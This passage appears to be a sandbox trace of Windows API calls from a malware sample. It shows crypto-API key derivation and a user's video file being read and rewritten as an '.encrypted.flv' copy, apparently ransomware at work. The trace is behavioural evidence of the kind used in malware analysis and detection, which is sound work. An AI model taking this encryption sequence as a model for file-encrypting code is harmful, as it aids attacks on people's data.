hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.935] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0041.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0041.935] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0041.936] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0041.936] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0041.936] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0041.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0041.936] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.936] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0041.936] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0041.936] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.936] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.936] CryptHashData (hHash=0x7c2240, pbData=0x7c50e0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0041.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0041.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.937] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.937] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.937] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0041.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.937] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.937] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.937] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0041.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0041.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.937] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.937] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0041.938] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.938] CryptDestroyHash (hHash=0x7c2240) returned 1 [0041.938] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.938] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.938] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0041.938] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0041.938] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.938] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s24ya.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.938] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.938] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0041.938] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.938] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0041.938] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.938] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.encrypted.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s24ya.encrypted.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.939] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.939] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0041.939] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.939] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.939] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0041.939] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0041.942] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x9f6, lpOverlapped=0x0) returned 1 [0041.942] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0041.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.942] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0041.943] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.943] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.943] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.944] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0041.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.945] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.945] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.945] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0041.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0041.945] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.945] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0041.945] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.945] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.945] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0041.945] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0041.946] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.946] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da398, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da398*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0041.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0041.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0041.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0041.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0041.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0041.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0041.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0041.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0041.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0041.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0041.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0041.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0041.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0041.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0041.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0041.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0041.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0041.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0041.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0041.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0041.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0041.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0041.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0041.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0041.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0041.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0041.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0041.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0041.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0041.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0041.948] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0041.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0041.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0041.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0041.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0041.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2340 [0041.948] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0041.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0041.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0041.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9a8 [0041.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0041.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0041.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0041.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0041.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 